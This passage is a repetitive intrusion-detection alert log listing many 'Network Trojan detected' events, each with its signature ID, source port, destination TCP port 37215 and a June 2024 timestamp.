          SID:2835222
          Source Port:52710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672544
          SID:2829579
          Source Port:54984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670263
          SID:2829579
          Source Port:50762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.747032
          SID:2829579
          Source Port:55854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239389
          SID:2829579
          Source Port:36958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271673
          SID:2835222
          Source Port:53148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897022
          SID:2829579
          Source Port:48002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356307
          SID:2835222
          Source Port:58654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854031
          SID:2829579
          Source Port:41870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166719
          SID:2835222
          Source Port:56190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733278
          SID:2835222
          Source Port:56190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191389
          SID:2829579
          Source Port:48966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672587
          SID:2835222
          Source Port:52978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893805
          SID:2835222
          Source Port:36366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796344
          SID:2829579
          Source Port:54532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.462428
          SID:2835222
          Source Port:36124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732163
          SID:2835222
          Source Port:39660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512610
          SID:2835222
          Source Port:41036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513147
          SID:2835222
          Source Port:58022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547434
          SID:2835222
          Source Port:35346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275724
          SID:2835222
          Source Port:37048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059854
          SID:2835222
          Source Port:60966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155579
          SID:2835222
          Source Port:37008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355954
          SID:2829579
          Source Port:33976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132128
          SID:2835222
          Source Port:50692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176678
          SID:2835222
          Source Port:60738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178145
          SID:2835222
          Source Port:50192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406138
          SID:2835222
          Source Port:55926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892520
          SID:2835222
          Source Port:47020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842046
          SID:2829579
          Source Port:33284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897332
          SID:2829579
          Source Port:53142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183825
          SID:2835222
          Source Port:49724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897171
          SID:2835222
          Source Port:58878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550787
          SID:2835222
          Source Port:54944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262391
          SID:2829579
          Source Port:43368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783935
          SID:2829579
          Source Port:50586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108042
          SID:2835222
          Source Port:48350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912769
          SID:2829579
          Source Port:55058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106303
          SID:2829579
          Source Port:44860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789769
          SID:2835222
          Source Port:34880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732040
          SID:2835222
          Source Port:59002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405478
          SID:2835222
          Source Port:35858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273334
          SID:2835222
          Source Port:38450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512328
          SID:2835222
          Source Port:37888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161678
          SID:2835222
          Source Port:49870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162776
          SID:2835222
          Source Port:42842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410154
          SID:2835222
          Source Port:57426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084684
          SID:2835222
          Source Port:45252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395191
          SID:2829579
          Source Port:33080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.443989
          SID:2835222
          Source Port:47766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407375
          SID:2835222
          Source Port:49698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039440
          SID:2829579
          Source Port:58892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353965
          SID:2835222
          Source Port:39798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157590
          SID:2835222
          Source Port:53148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176068
          SID:2829579
          Source Port:54874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055437
          SID:2835222
          Source Port:42634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.881228
          SID:2835222
          Source Port:33304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109284
          SID:2829579
          Source Port:51126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449580
          SID:2835222
          Source Port:38410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.805830
          SID:2829579
          Source Port:49956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353344
          SID:2829579
          Source Port:54500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113702
          SID:2835222
          Source Port:35928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894662
          SID:2835222
          Source Port:43582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271724
          SID:2835222
          Source Port:43272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274259
          SID:2829579
          Source Port:44912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806191
          SID:2829579
          Source Port:53068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731382
          SID:2835222
          Source Port:58136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107433
          SID:2835222
          Source Port:34644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352340
          SID:2835222
          Source Port:55088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237243
          SID:2835222
          Source Port:55966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861317
          SID:2835222
          Source Port:41746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099542
          SID:2835222
          Source Port:35844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894227
          SID:2835222
          Source Port:59764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786465
          SID:2835222
          Source Port:43432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159100
          SID:2835222
          Source Port:50854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350710
          SID:2835222
          Source Port:44088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729603
          SID:2829579
          Source Port:55156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495989
          SID:2829579
          Source Port:49588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274440
          SID:2835222
          Source Port:48890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356324
          SID:2835222
          Source Port:47052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.740881
          SID:2829579
          Source Port:58404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406989
          SID:2829579
          Source Port:45698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736955
          SID:2829579
          Source Port:43798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108233
          SID:2829579
          Source Port:43050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817335
          SID:2829579
          Source Port:43016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.674197
          SID:2835222
          Source Port:54176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015731
          SID:2835222
          Source Port:43390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787994
          SID:2835222
          Source Port:55408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896022
          SID:2835222
          Source Port:60660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550945
          SID:2829579
          Source Port:37706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352451
          SID:2829579
          Source Port:44694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267744
          SID:2835222
          Source Port:47792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746926
          SID:2829579
          Source Port:38200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792180
          SID:2835222
          Source Port:54334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731475
          SID:2829579
          Source Port:55094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509911
          SID:2835222
          Source Port:34188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730933
          SID:2835222
          Source Port:58092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822445
          SID:2835222
          Source Port:36940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466883
          SID:2835222
          Source Port:55412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237428
          SID:2829579
          Source Port:55282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272823
          SID:2835222
          Source Port:40516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179967
          SID:2829579
          Source Port:54968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741448
          SID:2835222
          Source Port:38528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.061853
          SID:2835222
          Source Port:55100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016189
          SID:2835222
          Source Port:57608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157391
          SID:2829579
          Source Port:58174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737988
          SID:2835222
          Source Port:35540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786858
          SID:2835222
          Source Port:58086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460314
          SID:2829579
          Source Port:46418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897117
          SID:2829579
          Source Port:51030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084720
          SID:2835222
          Source Port:56892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896028
          SID:2835222
          Source Port:49260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396750
          SID:2835222
          Source Port:55490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548455
          SID:2829579
          Source Port:34682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552392
          SID:2829579
          Source Port:34846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896948
          SID:2835222
          Source Port:43546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746785
          SID:2835222
          Source Port:52132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511533
          SID:2829579
          Source Port:42520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730511
          SID:2835222
          Source Port:44138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179980
          SID:2829579
          Source Port:48516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466578
          SID:2835222
          Source Port:54672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704728
          SID:2829579
          Source Port:59758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731592
          SID:2835222
          Source Port:54428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444784
          SID:2835222
          Source Port:51116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.734094
          SID:2835222
          Source Port:37034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044919
          SID:2829579
          Source Port:38796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599632
          SID:2829579
          Source Port:49712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404741
          SID:2829579
          Source Port:38020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176220
          SID:2835222
          Source Port:43356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180503
          SID:2829579
          Source Port:52734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858003
          SID:2835222
          Source Port:56886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350769
          SID:2829579
          Source Port:52520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792598
          SID:2829579
          Source Port:35958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015712
          SID:2835222
          Source Port:49338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792954
          SID:2829579
          Source Port:56292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800388
          SID:2829579
          Source Port:50264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172566
          SID:2835222
          Source Port:34608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464703
          SID:2835222
          Source Port:53224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800750
          SID:2829579
          Source Port:36702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005583
          SID:2835222
          Source Port:49686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262369
          SID:2835222
          Source Port:35224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262295
          SID:2835222
          Source Port:48660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854938
          SID:2829579
          Source Port:42264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395909
          SID:2835222
          Source Port:59398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542921
          SID:2829579
          Source Port:33280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552285
          SID:2835222
          Source Port:38166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733675
          SID:2835222
          Source Port:44202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237486
          SID:2835222
          Source Port:60440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460722
          SID:2835222
          Source Port:50908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155940
          SID:2829579
          Source Port:56960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114387
          SID:2835222
          Source Port:51646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792004
          SID:2835222
          Source Port:34308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262473
          SID:2835222
          Source Port:34294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601544
          SID:2835222
          Source Port:58412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471854
          SID:2835222
          Source Port:57670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157313
          SID:2835222
          Source Port:50380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259646
          SID:2829579
          Source Port:39072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406975
          SID:2835222
          Source Port:57602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862673
          SID:2835222
          Source Port:53180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602656
          SID:2829579
          Source Port:36336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744311
          SID:2829579
          Source Port:55770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402596
          SID:2829579
          Source Port:53904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165978
          SID:2835222
          Source Port:55432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884235
          SID:2835222
          Source Port:57336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173833
          SID:2835222
          Source Port:55376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890463
          SID:2835222
          Source Port:33090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394196
          SID:2835222
          Source Port:60852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663605
          SID:2829579
          Source Port:38582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745129
          SID:2835222
          Source Port:49258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668201
          SID:2829579
          Source Port:59592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816716
          SID:2829579
          Source Port:39580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.802555
          SID:2835222
          Source Port:50100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891879
          SID:2835222
          Source Port:57806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272141
          SID:2829579
          Source Port:49680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448632
          SID:2829579
          Source Port:57530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895635
          SID:2829579
          Source Port:39366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178396
          SID:2829579
          Source Port:35380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495817
          SID:2829579
          Source Port:45658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602673
          SID:2835222
          Source Port:59242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604068
          SID:2829579
          Source Port:57808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242990
          SID:2829579
          Source Port:45418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788326
          SID:2829579
          Source Port:46228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668160
          SID:2835222
          Source Port:38552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884291
          SID:2835222
          Source Port:38628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729190
          SID:2835222
          Source Port:46346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853205
          SID:2829579
          Source Port:37090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787790
          SID:2835222
          Source Port:58970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239351
          SID:2829579
          Source Port:44500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747388
          SID:2835222
          Source Port:43676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128644
          SID:2829579
          Source Port:56312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158051
          SID:2835222
          Source Port:48626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705329
          SID:2829579
          Source Port:44086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262702
          SID:2829579
          Source Port:34062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887760
          SID:2829579
          Source Port:58430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178847
          SID:2829579
          Source Port:36464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795799
          SID:2835222
          Source Port:32786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782559
          SID:2829579
          Source Port:47644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786437
          SID:2829579
          Source Port:52380
          Destination Port:37215
